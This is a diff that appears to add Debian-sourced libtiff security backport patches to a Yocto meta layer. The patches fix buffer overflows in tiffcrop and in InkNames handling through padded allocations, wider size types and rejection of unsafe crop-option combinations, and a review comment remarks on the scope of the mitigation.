212+ bytebuff2 = (uint8)(buff2 >> 48);
213 *dst++ = bytebuff2;
214- bytebuff3 = (buff2 >> 40);
215+ bytebuff3 = (uint8)(buff2 >> 40);
216 *dst++ = bytebuff3;
217- bytebuff4 = (buff2 >> 32);
218+ bytebuff4 = (uint8)(buff2 >> 32);
219 *dst++ = bytebuff4;
220 ready_bits -= 32;
221
222@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
223 static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
224 {
225 uint8* bufp = buf;
226- int32 bytes_read = 0;
227+ tmsize_t bytes_read = 0;
228 uint32 strip, nstrips = TIFFNumberOfStrips(in);
229- uint32 stripsize = TIFFStripSize(in);
230- uint32 rows = 0;
231+ tmsize_t stripsize = TIFFStripSize(in);
232+ tmsize_t rows = 0;
233 uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
234 tsize_t scanline_size = TIFFScanlineSize(in);
235
236@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
237 bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
238 rows = bytes_read / scanline_size;
239 if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
240- TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
241- (int)strip + 1, (unsigned long) bytes_read,
242- (unsigned long)stripsize);
243+ TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
244+ strip + 1, bytes_read, stripsize);
245
246 if (bytes_read < 0 && !ignore) {
247- TIFFError("", "Error reading strip %lu after %lu rows",
248- (unsigned long) strip, (unsigned long)rows);
249+ TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
250+ strip, rows);
251 return 0;
252 }
253 bufp += stripsize;
254@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
255 /* If we have a full buffer's worth, write it out */
256 if (ready_bits >= 32)
257 {
258- bytebuff1 = (buff2 >> 56);
259+ bytebuff1 = (uint8)(buff2 >> 56);
260 *dst++ = bytebuff1;
261- bytebuff2 = (buff2 >> 48);
262+ bytebuff2 = (uint8)(buff2 >> 48);
263 *dst++ = bytebuff2;
264- bytebuff3 = (buff2 >> 40);
265+ bytebuff3 = (uint8)(buff2 >> 40);
266 *dst++ = bytebuff3;
267- bytebuff4 = (buff2 >> 32);
268+ bytebuff4 = (uint8)(buff2 >> 32);
269 *dst++ = bytebuff4;
270 ready_bits -= 32;
271
272@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
273 "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
274 row + 1, col + 1, src_byte, src_bit, dst - out);
275
276- dump_long (dumpfile, format, "Match bits ", matchbits);
277+ dump_wide (dumpfile, format, "Match bits ", matchbits);
278 dump_data (dumpfile, format, "Src bits ", src, 4);
279- dump_long (dumpfile, format, "Buff1 bits ", buff1);
280- dump_long (dumpfile, format, "Buff2 bits ", buff2);
281+ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
282+ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
283 dump_byte (dumpfile, format, "Write bits1", bytebuff1);
284 dump_byte (dumpfile, format, "Write bits2", bytebuff2);
285 dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
286@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
287 /* If we have a full buffer's worth, write it out */
288 if (ready_bits >= 32)
289 {
290- bytebuff1 = (buff2 >> 56);
291+ bytebuff1 = (uint8)(buff2 >> 56);
292 *dst++ = bytebuff1;
293- bytebuff2 = (buff2 >> 48);
294+ bytebuff2 = (uint8)(buff2 >> 48);
295 *dst++ = bytebuff2;
296- bytebuff3 = (buff2 >> 40);
297+ bytebuff3 = (uint8)(buff2 >> 40);
298 *dst++ = bytebuff3;
299- bytebuff4 = (buff2 >> 32);
300+ bytebuff4 = (uint8)(buff2 >> 32);
301 *dst++ = bytebuff4;
302 ready_bits -= 32;
303
304@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
305 "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
306 row + 1, col + 1, src_byte, src_bit, dst - out);
307
308- dump_long (dumpfile, format, "Match bits ", matchbits);
309+ dump_wide (dumpfile, format, "Match bits ", matchbits);
310 dump_data (dumpfile, format, "Src bits ", src, 4);
311- dump_long (dumpfile, format, "Buff1 bits ", buff1);
312- dump_long (dumpfile, format, "Buff2 bits ", buff2);
313+ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
314+ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
315 dump_byte (dumpfile, format, "Write bits1", bytebuff1);
316 dump_byte (dumpfile, format, "Write bits2", bytebuff2);
317 dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
318@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
319 {
320 int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
321 uint32 j;
322- int32 bytes_read = 0;
323+ tmsize_t bytes_read = 0;
324 uint16 bps = 0, planar;
325 uint32 nstrips;
326 uint32 strips_per_sample;
327@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
328 for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
329 {
330 srcbuffs[s] = NULL;
331- buff = _TIFFmalloc(stripsize + 3);
332+ buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
333 if (!buff)
334 {
335 TIFFError ("readSeparateStripsIntoBuffer",
336@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
337 buff = srcbuffs[s];
338 strip = (s * strips_per_sample) + j;
339 bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
340- rows_this_strip = bytes_read / src_rowsize;
341+ rows_this_strip = (uint32)(bytes_read / src_rowsize);
342 if (bytes_read < 0 && !ignore)
343 {
344 TIFFError(TIFFFileName(in),
345@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
346 uint16 input_compression = 0, input_photometric = 0;
347 uint16 subsampling_horiz, subsampling_vert;
348 uint32 width = 0, length = 0;
349- uint32 stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
350+ tmsize_t stsize = 0, tlsize = 0, buffsize = 0;
351+ tmsize_t scanlinesize = 0;
352 uint32 tw = 0, tl = 0; /* Tile width and length */
353- uint32 tile_rowsize = 0;
354+ tmsize_t tile_rowsize = 0;
355 unsigned char *read_buff = NULL;
356 unsigned char *new_buff = NULL;
357 int readunit = 0;
358- static uint32 prev_readsize = 0;
359+ static tmsize_t prev_readsize = 0;
360
361 TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
362 TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
363@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
364 TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
365 return (-1);
366 }
367- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
368+ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
369 }
370 else
371 {
372@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
373 TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
374 return (-1);
375 }
376- new_buff = _TIFFrealloc(read_buff, buffsize+3);
377+ new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
378 if (!new_buff)
379 {
380 free (read_buff);
381- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
382+ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
383 }
384 else
385 read_buff = new_buff;
386@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
387 dump_info (dump->infile, dump->format, "",
388 "Bits per sample %d, Samples per pixel %d", bps, spp);
389
390+ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
391+ dump_info(dump->infile, dump->format, "loadImage",
392+ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
393+ (uint64_t)scanlinesize);
394+ }
395 for (i = 0; i < length; i++)
396- dump_buffer(dump->infile, dump->format, 1, scanlinesize,
397+ dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize,
398 i, read_buff + (i * scanlinesize));
399 }
400 return (0);
401@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
402 if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
403 TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
404 if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
405- int inknameslen = strlen(inknames) + 1;
406+ int inknameslen = (int)strlen(inknames) + 1;
407 const char* cp = inknames;
408 while (ninks > 1) {
409 cp = strchr(cp, '\0');
410 if (cp) {
411 cp++;
412- inknameslen += (strlen(cp) + 1);
413+ inknameslen += ((int)strlen(cp) + 1);
414 }
415 ninks--;
416 }
417@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
418
419 if (!sect_buff)
420 {
421- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
422+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
423 if (!sect_buff)
424 {
425 TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
426 return (-1);
427 }
428- _TIFFmemset(sect_buff, 0, sectsize);
429+ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
430 }
431 else
432 {
433 if (prev_sectsize < sectsize)
434 {
435- new_buff = _TIFFrealloc(sect_buff, sectsize);
436+ new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
437 if (!new_buff)
438 {
439 free (sect_buff);
440- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
441+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
442 }
443 else
444 sect_buff = new_buff;
445@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
446 TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
447 return (-1);
448 }
449- _TIFFmemset(sect_buff, 0, sectsize);
450+ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
451 }
452 }
453
454@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
455 cropsize = crop->bufftotal;
456 crop_buff = seg_buffs[0].buffer;
457 if (!crop_buff)
458- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
459+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
460 else
461 {
462 prev_cropsize = seg_buffs[0].size;
463 if (prev_cropsize < cropsize)
464 {
465- next_buff = _TIFFrealloc(crop_buff, cropsize);
466+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
467 if (! next_buff)
468 {
469 _TIFFfree (crop_buff);
470- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
471+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
472 }
473 else
474 crop_buff = next_buff;
475@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
476 return (-1);
477 }
478
479- _TIFFmemset(crop_buff, 0, cropsize);
480+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
481 seg_buffs[0].buffer = crop_buff;
482 seg_buffs[0].size = cropsize;
483
484@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
485 cropsize = crop->bufftotal;
486 crop_buff = seg_buffs[i].buffer;
487 if (!crop_buff)
488- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
489+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
490 else
491 {
492 prev_cropsize = seg_buffs[0].size;
493 if (prev_cropsize < cropsize)
494 {
495- next_buff = _TIFFrealloc(crop_buff, cropsize);
496+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
497 if (! next_buff)
498 {
499 _TIFFfree (crop_buff);
500- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
501+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
502 }
503 else
504 crop_buff = next_buff;
505@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
506 return (-1);
507 }
508
509- _TIFFmemset(crop_buff, 0, cropsize);
510+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
511 seg_buffs[i].buffer = crop_buff;
512 seg_buffs[i].size = cropsize;
513
514@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
515 crop_buff = *crop_buff_ptr;
516 if (!crop_buff)
517 {
518- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
519+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
520 if (!crop_buff)
521 {
522 TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
523 return (-1);
524 }
525- _TIFFmemset(crop_buff, 0, cropsize);
526+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
527 prev_cropsize = cropsize;
528 }
529 else
530 {
531 if (prev_cropsize < cropsize)
532 {
533- new_buff = _TIFFrealloc(crop_buff, cropsize);
534+ new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
535 if (!new_buff)
536 {
537 free (crop_buff);
538- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
539+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
540 }
541 else
542 crop_buff = new_buff;
543@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
544 TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
545 return (-1);
546 }
547- _TIFFmemset(crop_buff, 0, cropsize);
548+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
549 }
550 }
551
552@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
553 if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
554 TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
555 if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
556- int inknameslen = strlen(inknames) + 1;
557+ int inknameslen = (int)strlen(inknames) + 1;
558 const char* cp = inknames;
559 while (ninks > 1) {
560 cp = strchr(cp, '\0');
561 if (cp) {
562 cp++;
563- inknameslen += (strlen(cp) + 1);
564+ inknameslen += ((int)strlen(cp) + 1);
565 }
566 ninks--;
567 }
568@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
569 }
570 else /* If we have a full buffer's worth, write it out */
571 {
572- bytebuff1 = (buff2 >> 56);
573+ bytebuff1 = (uint8)(buff2 >> 56);
574 *dst++ = bytebuff1;
575- bytebuff2 = (buff2 >> 48);
576+ bytebuff2 = (uint8)(buff2 >> 48);
577 *dst++ = bytebuff2;
578- bytebuff3 = (buff2 >> 40);
579+ bytebuff3 = (uint8)(buff2 >> 40);
580 *dst++ = bytebuff3;
581- bytebuff4 = (buff2 >> 32);
582+ bytebuff4 = (uint8)(buff2 >> 32);
583 *dst++ = bytebuff4;
584 ready_bits -= 32;
585
586@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
587 return (-1);
588 }
589
590- if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
591+ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
592+ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
593 {
594- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
595+ TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
596 return (-1);
597 }
598- _TIFFmemset(rbuff, '\0', buffsize);
599+ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
600
601 ibuff = *ibuff_ptr;
602 switch (rotation)
603@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
604 }
605 else /* If we have a full buffer's worth, write it out */
606 {
607- bytebuff1 = (buff2 >> 56);
608+ bytebuff1 = (uint8)(buff2 >> 56);
609 *dst++ = bytebuff1;
610- bytebuff2 = (buff2 >> 48);
611+ bytebuff2 = (uint8)(buff2 >> 48);
612 *dst++ = bytebuff2;
613- bytebuff3 = (buff2 >> 40);
614+ bytebuff3 = (uint8)(buff2 >> 40);
615 *dst++ = bytebuff3;
616- bytebuff4 = (buff2 >> 32);
617+ bytebuff4 = (uint8)(buff2 >> 32);
618 *dst++ = bytebuff4;
619 ready_bits -= 32;
620
621@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
622 {
623 case MIRROR_BOTH:
624 case MIRROR_VERT:
625- line_buff = (unsigned char *)_TIFFmalloc(rowsize);
626+ line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
627 if (line_buff == NULL)
628 {
629- TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
630+ TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
631 return (-1);
632 }
633+ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
634
635 dst = ibuff + (rowsize * (length - 1));
636 for (row = 0; row < length / 2; row++)
637@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
638 }
639 else
640 { /* non 8 bit per sample data */
641- if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
642+ if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
643 {
644 TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
645 return (-1);
646 }
647+ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
648 bytes_per_sample = (bps + 7) / 8;
649 bytes_per_pixel = ((bps * spp) + 7) / 8;
650 if (bytes_per_pixel < (bytes_per_sample + 1))
651@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
652 {
653 row_offset = row * rowsize;
654 src = ibuff + row_offset;
655- _TIFFmemset (line_buff, '\0', rowsize);
656+ _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
657 switch (shift_width)
658 {
659 case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
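--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
+From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 10 May 2022 20:03:17 +0000
+Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+---
+ tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
+ 1 file changed, 42 insertions(+), 8 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c923920..a0789a3 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -103,7 +103,12 @@
+ * selects which functions dump data, with higher numbers selecting
+ * lower level, scanline level routines. Debug reports a limited set
+ * of messages to monitor progess without enabling dump logs.
+- */
++ *
++ * Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.
++ * In no case should the options be applied to a given selection successively.
++ * Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++ */
+
+ static char tiffcrop_version_id[] = "2.4.1";
+ static char tiffcrop_rev_date[] = "03-03-2010";
+@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ #define ROTATECW_270 32
+ #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
+
+-#define CROP_NONE 0
+-#define CROP_MARGINS 1
+-#define CROP_WIDTH 2
+-#define CROP_LENGTH 4
+-#define CROP_ZONES 8
+-#define CROP_REGIONS 16
++#define CROP_NONE 0 /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
++#define CROP_MARGINS 1 /* "-m" */
++#define CROP_WIDTH 2 /* "-X" */
++#define CROP_LENGTH 4 /* "-Y" */
++#define CROP_ZONES 8 /* "-Z" */
++#define CROP_REGIONS 16 /* "-z" */
+ #define CROP_ROTATE 32
+ #define CROP_MIRROR 64
+ #define CROP_INVERT 128
+@@ -323,7 +328,7 @@ struct crop_mask {
+ #define PAGE_MODE_RESOLUTION 1
+ #define PAGE_MODE_PAPERSIZE 2
+ #define PAGE_MODE_MARGINS 4
+-#define PAGE_MODE_ROWSCOLS 8
++#define PAGE_MODE_ROWSCOLS 8 /* for -S option */
+
+ #define INVERT_DATA_ONLY 10
+ #define INVERT_DATA_AND_TAG 11
+@@ -754,6 +759,12 @@ static char* usage_info[] = {
+ " The four debug/dump options are independent, though it makes little sense to",
+ " specify a dump file without specifying a detail level.",
+ " ",
++"Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
++" In no case should the options be applied to a given selection successively.",
++" ",
++"Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
++" such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
++" ",
+ NULL
+ };
+
+@@ -2112,6 +2123,27 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+ /*NOTREACHED*/
+ }
+ }
++ /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
++ char XY, Z, R, S;
++ XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
++ Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
++ R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
++ S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
++ if (XY + Z + R + S > 1) {
++ TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
++ exit(EXIT_FAILURE);
++ }
++
++ /* Check for not allowed combination:
++ * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
+. */
++ if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
++ TIFFError("tiffcrop input error",
++ "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
++ exit(EXIT_FAILURE);
++ }
++
+ } /* end process_command_opts */
+
+ /* Start a new output file if one has not been previously opened or
+@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+
++ /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
+ if (crop.selections > 0)
+ {
+ if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
+@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+ }
++ /* Format and write selected image parts to output file(s). */
+ if (page.mode == PAGE_MODE_NONE)
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)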
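Review bot: The two option-combination guards added at the end of `process_command_opts` reject the dangerous combinations but do not make them safe. The buffer handling behind those combinations is left as it was, and the new usage text says as much ("may cause buffer overflows"). The guard should state that, so it is not relaxed later without revisiting the write paths, for example `/* Mitigation for CVE-2022-3597, CVE-2022-3626, CVE-2022-3627: these combinations are rejected, not made safe; do not relax without fixing the buffer handling. */`. Two smaller points: the new messages print `- H` with a stray space and end in `..->exit`, and the new checks call `exit(EXIT_FAILURE)` while the `main` context lines use `exit (-1)`. `process_command_opts` begins outside the hunk.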
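--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
+From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 30 Aug 2022 16:56:48 +0200
+Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ TIFFTAG_NUMBEROFINKS value
+
+In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
+
+Behaviour for writing:
+ `NumberOfInks` MUST fit to the number of inks in the `InkNames` string.
+ `NumberOfInks` is automatically set when `InkNames` is set.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+Behaviour for reading:
+ When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
+
+This MR will close the following issues: #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
+
+It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
+
+---
+ libtiff/tif_dir.c | 120 ++++++++++++++++++++++++-----------------
+ libtiff/tif_dir.h | 2 +
+ libtiff/tif_dirinfo.c | 2 +-
+ libtiff/tif_dirwrite.c | 5 ++
+ libtiff/tif_print.c | 4 ++
+ 5 files changed, 83 insertions(+), 50 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 39aeeb4..9d8267a 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -29,6 +29,7 @@
+ * (and also some miscellaneous stuff)
+ */
+ #include "tiffiop.h"
++# include <inttypes.h>
+
+ /*
+ * These are used in the backwards compatibility code...
+@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
+ }
+
+ /*
+- * Confirm we have "samplesperpixel" ink names separated by \0. Returns
++ * Count ink names separated by \0. Returns
+ * zero if the ink names are not as expected.
+ */
+-static uint32
+-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
++static uint16
++countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+- TIFFDirectory* td = &tif->tif_dir;
+- uint16 i = td->td_samplesperpixel;
++ uint16 i = 0;
++ const char *ep = s + slen;
++ const char *cp = s;
+
+ if (slen > 0) {
+- const char* ep = s+slen;
+- const char* cp = s;
+- for (; i > 0; i--) {
++ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+ goto bad;
+ cp++; /* skip \0 */
+- }
+- return ((uint32)(cp-s));
++ i++;
++ } while (cp < ep);
++ return (i);
+ }
+ bad:
+ TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
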